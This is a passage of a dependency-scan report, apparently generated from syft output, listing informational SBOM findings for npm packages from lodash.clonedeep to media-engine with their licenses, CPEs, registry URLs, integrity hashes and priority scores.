spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash.clonedeep:lodash.clonedeep:4.5.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lodash.clonedeep@4.5.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz
integrity: sha512-H5ZhCF25riFd9uB5UCkVKo61m3S/xZk1x4wA6yp/L3RFP6Z/eHH1ymQcGLo7J3GMPfm0V/7m1tryHuGVxpqEBQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6ee3a377a52860b5
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash.defaults 4.2.0'
title: lodash.defaults 4.2.0
description: 'Package discovered: lodash.defaults 4.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 59a8c664dfef6c46
name: lodash.defaults
version: 4.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash.defaults:lodash.defaults:4.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lodash.defaults@4.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash.defaults/-/lodash.defaults-4.2.0.tgz
integrity: sha512-qjxPLHd3r5DnsdGacqOMU6pb/avJzdh9tFX2ymgoZE27BmjXrNy/y4LoaiTeAb+O3gL8AfpJGtqfX/ae2leYYQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a3b4683fdc629aef
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash.includes 4.3.0'
title: lodash.includes 4.3.0
description: 'Package discovered: lodash.includes 4.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: aa93a44741b08e66
name: lodash.includes
version: 4.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash.includes:lodash.includes:4.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lodash.includes@4.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash.includes/-/lodash.includes-4.3.0.tgz
integrity: sha512-W3Bx6mdkRTGtlJISOvVD/lbqjTlPPUDTMnlXZFnVwi9NKJ6tiAk6LVdlhZMm17VZisqhKcgzpO5Wz91PCt5b0w==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: c512306c360b6fda
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash.isarguments 3.1.0'
title: lodash.isarguments 3.1.0
description: 'Package discovered: lodash.isarguments 3.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: c84bded77fb6b828
name: lodash.isarguments
version: 3.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash.isarguments:lodash.isarguments:3.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lodash.isarguments@3.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash.isarguments/-/lodash.isarguments-3.1.0.tgz
integrity: sha512-chi4NHZlZqZD18a0imDHnZPrDeBbTtVN7GXMwuGdRH9qotxAjYs3aVLKc7zNOG9eddR5Ksd8rvFEBc9SsggPpg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f0317f2d62f56421
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash.isboolean 3.0.3'
title: lodash.isboolean 3.0.3
description: 'Package discovered: lodash.isboolean 3.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: df154b64f7d4588a
name: lodash.isboolean
version: 3.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash.isboolean:lodash.isboolean:3.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lodash.isboolean@3.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash.isboolean/-/lodash.isboolean-3.0.3.tgz
integrity: sha512-Bz5mupy2SVbPHURB98VAcw+aHh4vRV5IPNhILUCsOzRmsTmSQ17jIuqopAentWoehktxGd9e/hbIXq980/1QJg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2ae1d391a80c5a72
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash.isinteger 4.0.4'
title: lodash.isinteger 4.0.4
description: 'Package discovered: lodash.isinteger 4.0.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: e92c8ae8d8c83e78
name: lodash.isinteger
version: 4.0.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash.isinteger:lodash.isinteger:4.0.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lodash.isinteger@4.0.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash.isinteger/-/lodash.isinteger-4.0.4.tgz
integrity: sha512-DBwtEWN2caHQ9/imiNeEA5ys1JoRtRfY3d7V9wkqtbycnAmTvRRmbHKDV4a0EYc678/dia0jrte4tjYwVBaZUA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0e12d10e43707e74
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash.isnumber 3.0.3'
title: lodash.isnumber 3.0.3
description: 'Package discovered: lodash.isnumber 3.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 32689628126e866e
name: lodash.isnumber
version: 3.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash.isnumber:lodash.isnumber:3.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lodash.isnumber@3.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash.isnumber/-/lodash.isnumber-3.0.3.tgz
integrity: sha512-QYqzpfwO3/CWf3XP+Z+tkQsfaLL/EnUlXWVkIk5FUPc4sBdTehEqZONuyRt2P67PXAk+NXmTBcc97zw9t1FQrw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f1231b7e60dd673c
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash.isplainobject 4.0.6'
title: lodash.isplainobject 4.0.6
description: 'Package discovered: lodash.isplainobject 4.0.6'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a6b14f73240e0d01
name: lodash.isplainobject
version: 4.0.6
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash.isplainobject:lodash.isplainobject:4.0.6:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lodash.isplainobject@4.0.6
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash.isplainobject/-/lodash.isplainobject-4.0.6.tgz
integrity: sha512-oSXzaWypCMHkPC3NvBEaPHf0KsA5mvPrOPgQWDsbg8n7orZ290M0BmC/jgRZ4vcJ6DTAhjrsSYgdsW/F+MFOBA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 1ec5aad22a5b316a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash.isstring 4.0.1'
title: lodash.isstring 4.0.1
description: 'Package discovered: lodash.isstring 4.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f161741909d3d58f
name: lodash.isstring
version: 4.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash.isstring:lodash.isstring:4.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lodash.isstring@4.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash.isstring/-/lodash.isstring-4.0.1.tgz
integrity: sha512-0wJxfxH1wgO3GrbuP+dTTk7op+6L41QCXbGINEmD+ny/G/eCqGzxyCsh7159S+mgDDcoarnBw6PC1PS5+wUGgw==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7962026049b4f49e
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lodash.once 4.1.1'
title: lodash.once 4.1.1
description: 'Package discovered: lodash.once 4.1.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f5ead8ead936acd7
name: lodash.once
version: 4.1.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lodash.once:lodash.once:4.1.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lodash.once@4.1.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz
integrity: sha512-Sb487aTOCr9drQVL8pIxOzVhafOjZN9UU54hiN8PU3uAiSV7lx1yYNpbNmex2PK6dSJoNTSJUUswT651yww3Mg==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: cf9c5c396fa8379f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: long 5.3.2'
title: long 5.3.2
description: 'Package discovered: long 5.3.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 22165934193ce3c8
name: long
version: 5.3.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:long:long:5.3.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/long@5.3.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/long/-/long-5.3.2.tgz
integrity: sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4615c5000eb45f3d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: loose-envify 1.4.0'
title: loose-envify 1.4.0
description: 'Package discovered: loose-envify 1.4.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 01ac139389c8bf08
name: loose-envify
version: 1.4.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:loose-envify:loose-envify:1.4.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:loose-envify:loose_envify:1.4.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:loose_envify:loose-envify:1.4.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:loose_envify:loose_envify:1.4.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:loose:loose-envify:1.4.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:loose:loose_envify:1.4.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/loose-envify@1.4.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz
integrity: sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q==
dependencies:
js-tokens: ^3.0.0 || ^4.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 8bf9ffa72cfbe889
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lru-cache 10.4.3'
title: lru-cache 10.4.3
description: 'Package discovered: lru-cache 10.4.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d68cb2f643232396
name: lru-cache
version: 10.4.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:isaacs:lru-cache:10.4.3:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/lru-cache@10.4.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz
integrity: sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a08719993444a9bd
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lru-cache 6.0.0'
title: lru-cache 6.0.0
description: 'Package discovered: lru-cache 6.0.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 3a3d54b6437f39f3
name: lru-cache
version: 6.0.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:isaacs:lru-cache:6.0.0:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/lru-cache@6.0.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz
integrity: sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==
dependencies:
yallist: ^4.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: fb9befbc81581725
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lru-memoizer 2.3.0'
title: lru-memoizer 2.3.0
description: 'Package discovered: lru-memoizer 2.3.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: adf63f866928cf12
name: lru-memoizer
version: 2.3.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lru-memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lru-memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lru_memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lru_memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lru:lru-memoizer:2.3.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lru:lru_memoizer:2.3.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lru-memoizer@2.3.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lru-memoizer/-/lru-memoizer-2.3.0.tgz
integrity: sha512-GXn7gyHAMhO13WSKrIiNfztwxodVsP8IoZ3XfrJV4yH2x0/OeTO/FIaAHTY5YekdGgW94njfuKmyyt1E0mR6Ug==
dependencies:
lodash.clonedeep: ^4.5.0
lru-cache: 6.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 03f163b26dd00375
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: lucide-react 0.376.0'
title: lucide-react 0.376.0
description: 'Package discovered: lucide-react 0.376.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9a372e50af0fe0ae
name: lucide-react
version: 0.376.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:lucide-react:lucide-react:0.376.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lucide-react:lucide_react:0.376.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lucide_react:lucide-react:0.376.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lucide_react:lucide_react:0.376.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lucide:lucide-react:0.376.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:lucide:lucide_react:0.376.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/lucide-react@0.376.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/lucide-react/-/lucide-react-0.376.0.tgz
integrity: sha512-g91IX3ERD6yUR1TL2dsL4BkcGygpZz/EsqjAeL/kcRQV0EApIOr/9eBfKhYOVyQIcGGuotFGjF3xKLHMEz+b7g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 0f65ff516206127f
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: math-intrinsics 1.1.0'
title: math-intrinsics 1.1.0
description: 'Package discovered: math-intrinsics 1.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 87a83232f7674dbc
name: math-intrinsics
version: 1.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:math-intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:math-intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:math_intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:math_intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:math:math-intrinsics:1.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:math:math_intrinsics:1.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/math-intrinsics@1.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz
integrity: sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9efbed3ea63ec0cc
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: media-engine 1.0.3'
title: media-engine 1.0.3
description: 'Package discovered: media-engine 1.0.3'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 1dbf081258d17462
name: media-engine
version: 1.0.3
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:media-engine:media-engine:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:media-engine:media_engine:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:media_engine:media-engine:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:media_engine:media_engine:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:media:media-engine:1.0.3:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:media:media_engine:1.0.3:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/media-engine@1.0.3
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/media-engine/-/media-engine-1.0.3.tgz
